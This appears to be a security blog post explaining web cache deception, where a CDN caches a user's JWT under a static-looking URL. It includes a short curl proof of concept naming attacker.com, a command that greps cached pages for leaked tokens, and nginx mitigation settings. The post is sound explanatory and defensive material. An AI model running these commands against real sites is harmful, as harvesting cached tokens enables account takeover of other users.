Listen to this Post

Cache Deception occurs when an attacker tricks a CDN or caching layer into caching dynamic, user-specific content under a URL that appears to serve static resources. If the application fails to enforce proper cache controls, sensitive data (such as JWT tokens) can be stored and later served to anyone accessing the same manipulated URL.
In the reported case, despite the server responding with a 404 Not Found, the victim’s JWT token remained in the response—and the CDN cached it. Attackers could then retrieve the token by accessing the same crafted URL, leading to full account takeover.
You Should Know:
How Cache Deception Works
- Identify Cacheable Endpoints – Attackers target URLs that appear static (e.g.,
/profile.css,/settings.json). - Force Cache Storage – Even if the response is a 404, if the CDN caches it, sensitive data may persist.
- Retrieve Cached Data – Any user requesting the same URL receives the cached response, exposing tokens or session data.
Exploit Code (Proof of Concept)
curl -i "https://victim.com/profile.css" -H "X-Forwarded-Host: attacker.com"
– If the CDN caches the response, check for leaked tokens:
curl -s "https://victim.com/profile.css" | grep -Eo "eyJ[a-zA-Z0-9_-]+.[a-zA-Z0-9_-]+.[a-zA-Z0-9_-]+"
Mitigation Techniques
- Disable Caching for Sensitive Endpoints
location ~ (.css|.json)$ { add_header Cache-Control "no-store, no-cache"; proxy_cache_bypass 1; } - Validate Cache Keys – Ensure CDNs differentiate between authenticated and unauthenticated requests.
- Use `Vary: Authorization` Header – Prevents caching of user-specific responses.
Testing for Cache Issues
1. Check Headers
curl -I "https://target.com/account" | grep -i "cache-control"
2. Verify Caching Behavior
for i in {1..5}; do curl -s "https://target.com/profile.css" -H "Cookie: session=123" | wc -l; done
– If responses are identical, caching may be misconfigured.
What Undercode Say
Cache deception remains a critical threat in web security, particularly when applications rely on CDNs without strict cache policies. Developers must:
– Audit cache configurations for dynamic endpoints.
– Implement strict `Cache-Control` headers.
– Monitor CDN logs for unusual caching patterns.
Expected Output:
HTTP/1.1 404 Not Found Cache-Control: public, max-age=3600 ... eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
Prediction:
As CDN adoption grows, cache-based attacks will increase, requiring stricter default security policies from cloud providers.
URLs for further reading:
References:
Reported By: Mohamed Kamal – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


